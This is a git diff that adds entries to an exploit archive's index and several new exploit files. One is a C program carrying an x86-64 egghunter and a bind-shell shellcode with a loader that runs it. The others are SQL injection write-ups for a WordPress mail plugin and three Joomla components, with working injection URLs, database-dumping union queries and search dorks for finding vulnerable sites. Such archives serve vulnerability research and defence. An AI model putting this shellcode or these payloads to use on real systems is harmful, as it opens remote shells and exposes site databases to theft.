diff --git a/files.csv b/files.csv index f585a64e1..d2d7b5a4c 100644 --- a/files.csv +++ b/files.csv @@ -15296,6 +15296,7 @@ id,file,description,date,author,platform,type,port 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0 +41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15912,6 +15913,7 @@ id,file,description,date,author,platform,type,port 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0 +41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -37354,3 +37356,7 @@ id,file,description,date,author,platform,type,port 41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0 41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0 41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0 +41438,platforms/php/webapps/41438.txt,"WordPress Plugin Mail Masta 1.0 - SQL Injection",2017-02-18,"Hanley Shun",php,webapps,0 +41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0 +41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0 +41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/linux/shellcode/41439.c b/platforms/linux/shellcode/41439.c new file mode 100755 index 000000000..4d2b6530e --- /dev/null +++ b/platforms/linux/shellcode/41439.c @@ -0,0 +1,174 @@ +/** + Copyright © 2017 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. + +; 38 byte Egg Hunter using sys_access() for x86-64 Linux +; + bits 64 + + xor edi, edi ; rdi = 0 + mul edi ; rax = 0, rdx = 0 + xchg eax, esi ; rsi = F_OK + mov dh, 10h ; rdx = 4096 +nxt_page: + add rdi, rdx ; advance 4096 bytes +nxt_addr: + push rdi ; save page address + add rdi, 8 ; try read 8 bytes ahead + push 21 + pop rax ; rax = sys_access + syscall + pop rdi ; restore rdi + cmp al, 0xF2 ; -EFAULT means bad address + je nxt_page ; keep going until good read + + ; put your own signature here + mov eax, 0xDEADC0DE + scasd + jne nxt_addr + + scasd + jne nxt_addr + + jmp rdi ; jump into shellcode + + + */ + +#include +#include +#include +#include + +#include +#include +#include +#include + +#define EGG64_SIZE 38 + +char EGG64[] = { + /* 0000 */ "\x31\xff" /* xor edi, edi */ + /* 0002 */ "\xf7\xe7" /* mul edi */ + /* 0004 */ "\x96" /* xchg esi, eax */ + /* 0005 */ "\xb6\x10" /* mov dh, 0x10 */ + /* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */ + /* 000A */ "\x57" /* push rdi */ + /* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */ + /* 000F */ "\x6a\x15" /* push 0x15 */ + /* 0011 */ "\x58" /* pop rax */ + /* 0012 */ "\x0f\x05" /* syscall */ + /* 0014 */ "\x5f" /* pop rdi */ + /* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */ + /* 0017 */ "\x74\xee" /* jz 0x7 */ + /* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */ + /* 001E */ "\xaf" /* scasd */ + /* 001F */ "\x75\xe9" /* jnz 0xa */ + /* 0021 */ "\xaf" /* scasd */ + /* 0022 */ "\x75\xe6" /* jnz 0xa */ + /* 0024 */ "\xff\xe7" /* jmp rdi */ +}; + +// sig is 0xDEADC0DE +#define EGG_SIG "\xDE\xC0\xAD\xDE" + +// 71 byte bind shell for x86-64 Linux. +// listens on 0.0.0.0:1234 +// +// port offset is 0x010 +// +char BS[] = { + EGG_SIG + EGG_SIG + /* 0000 */ "\x6a\x29" /* push 0x29 */ + /* 0002 */ "\x58" /* pop rax */ + /* 0003 */ "\x6a\x01" /* push 0x1 */ + /* 0005 */ "\x5e" /* pop rsi */ + /* 0006 */ "\x6a\x02" /* push 0x2 */ + /* 0008 */ "\x5f" /* pop rdi */ + /* 0009 */ "\x99" /* cdq */ + /* 000A */ "\x0f\x05" /* syscall */ + /* 000C */ "\x97" /* xchg edi, eax */ + /* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */ + /* 0012 */ "\xfe\xc7" /* inc bh */ + /* 0014 */ "\x53" /* push rbx */ + /* 0015 */ "\x54" /* push rsp */ + /* 0016 */ "\x5e" /* pop rsi */ + /* 0017 */ "\xb2\x10" /* mov dl, 0x10 */ + /* 0019 */ "\xb0\x31" /* mov al, 0x31 */ + /* 001B */ "\x0f\x05" /* syscall */ + /* 001D */ "\x31\xf6" /* xor esi, esi */ + /* 001F */ "\xb0\x32" /* mov al, 0x32 */ + /* 0021 */ "\x0f\x05" /* syscall */ + /* 0023 */ "\xb0\x2b" /* mov al, 0x2b */ + /* 0025 */ "\x0f\x05" /* syscall */ + /* 0027 */ "\x97" /* xchg edi, eax */ + /* 0028 */ "\x96" /* xchg esi, eax */ + /* 0029 */ "\xb0\x21" /* mov al, 0x21 */ + /* 002B */ "\x0f\x05" /* syscall */ + /* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */ + /* 0030 */ "\x79\xf7" /* jns 0x29 */ + /* 0032 */ "\x31\xf6" /* xor esi, esi */ + /* 0034 */ "\x50" /* push rax */ + /* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */ + /* 003F */ "\x51" /* push rcx */ + /* 0040 */ "\x54" /* push rsp */ + /* 0041 */ "\x5f" /* pop rdi */ + /* 0042 */ "\x99" /* cdq */ + /* 0043 */ "\xb0\x3b" /* mov al, 0x3b */ + /* 0045 */ "\x0f\x05" /* syscall */ +}; + +void xcode(char *s, int len) +{ + uint8_t *p; + + p=(uint8_t*)mmap (0, len, + PROT_EXEC | PROT_WRITE | PROT_READ, + MAP_ANON | MAP_PRIVATE, -1, 0); + + memcpy(p, s, len); + + // execute + ((void(*)())p)(); + + munmap ((void*)p, len); +} + +int main(int argc, char *argv[]) +{ + uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS), + PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + + if (sc != NULL) { + memcpy (sc, BS, sizeof(BS)); + xcode (EGG64, EGG64_SIZE); + munmap((void*)sc, sizeof(BS)); + } + return 0; +} diff --git a/platforms/macos/remote/41443.html b/platforms/macos/remote/41443.html new file mode 100755 index 000000000..e58d98e31 --- /dev/null +++ b/platforms/macos/remote/41443.html @@ -0,0 +1,69 @@ + + + diff --git a/platforms/php/webapps/41438.txt b/platforms/php/webapps/41438.txt new file mode 100755 index 000000000..45a8f5b2b --- /dev/null +++ b/platforms/php/webapps/41438.txt @@ -0,0 +1,80 @@ +# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress. +# Date: 02/18/2017 +# Exploit Author: Hanley Shun +# Vendor Homepage: https://github.com/hamkovic/ +# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip +# Version: 1.0 +# Tested on: Kali Linux x64, Ubuntu 14.04 x64 +# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098] + + +Mail-Masta SQL Injection + +Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated) + +GET Parameter: list_id + +http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php + + +csvexport.php: + +$list_id=$_GET['list_id']; +global $wpdb; +$mail_subscribers = $wpdb->prefix . "masta_subscribers"; +$masta_list = $wpdb->prefix . "masta_list"; +$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id"; +$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id"; +$wp_list=$wpdb->get_results($check_sql); +$wp_list_s=$wpdb->get_results($check_list); + + +Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin) + +GET Parameter: filter_list + +http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1 + + +view-list.php: + +global $wpdb; +$list_id = $_GET['filter_list']; +$masta_list = $wpdb->prefix . "masta_list"; +$masta_subscribers = $wpdb->prefix . "masta_subscribers"; +$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query)); +$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query)); + + +Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin) + +POST Parameter: camp_id + +http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php + + +count_of_send.php: + +include($_GET['pl']); +global $wpdb; +$camp_id=$_POST['camp_id']; +$masta_reports = $wpdb->prefix . "masta_reports"; +$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1"); + + +Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin) + +POST Parameter: list_id + +campaign_save.php: + +$list_id=$_POST['list_id']; +$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id"); + + +POST /wp-admin/admin-ajax.php?id= HTTP/1.1 + +...snip... + +action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1 + diff --git a/platforms/php/webapps/41440.txt b/platforms/php/webapps/41440.txt new file mode 100755 index 000000000..666193e5e --- /dev/null +++ b/platforms/php/webapps/41440.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_k2store +# Date: 23.02.2017 +# Vendor Homepage: http://jworkplace.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/ +# Demo: http://k2store.jworkplace.com/ +# Version: 3.8.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41441.txt b/platforms/php/webapps/41441.txt new file mode 100755 index 000000000..b9f0b1a42 --- /dev/null +++ b/platforms/php/webapps/41441.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_userextranet +# Date: 23.02.2017 +# Vendor Homepage: http://www.beesto.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/ +# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo +# Version: 1.3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL] +# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - +# # # # # diff --git a/platforms/php/webapps/41442.txt b/platforms/php/webapps/41442.txt new file mode 100755 index 000000000..ee8727106 --- /dev/null +++ b/platforms/php/webapps/41442.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_multitier +# Date: 23.02.2017 +# Vendor Homepage: http://www.beesto.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/ +# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo +# Version: 3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL] +# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- - +# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL] +# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- - +# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL] +# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- - +# # # # #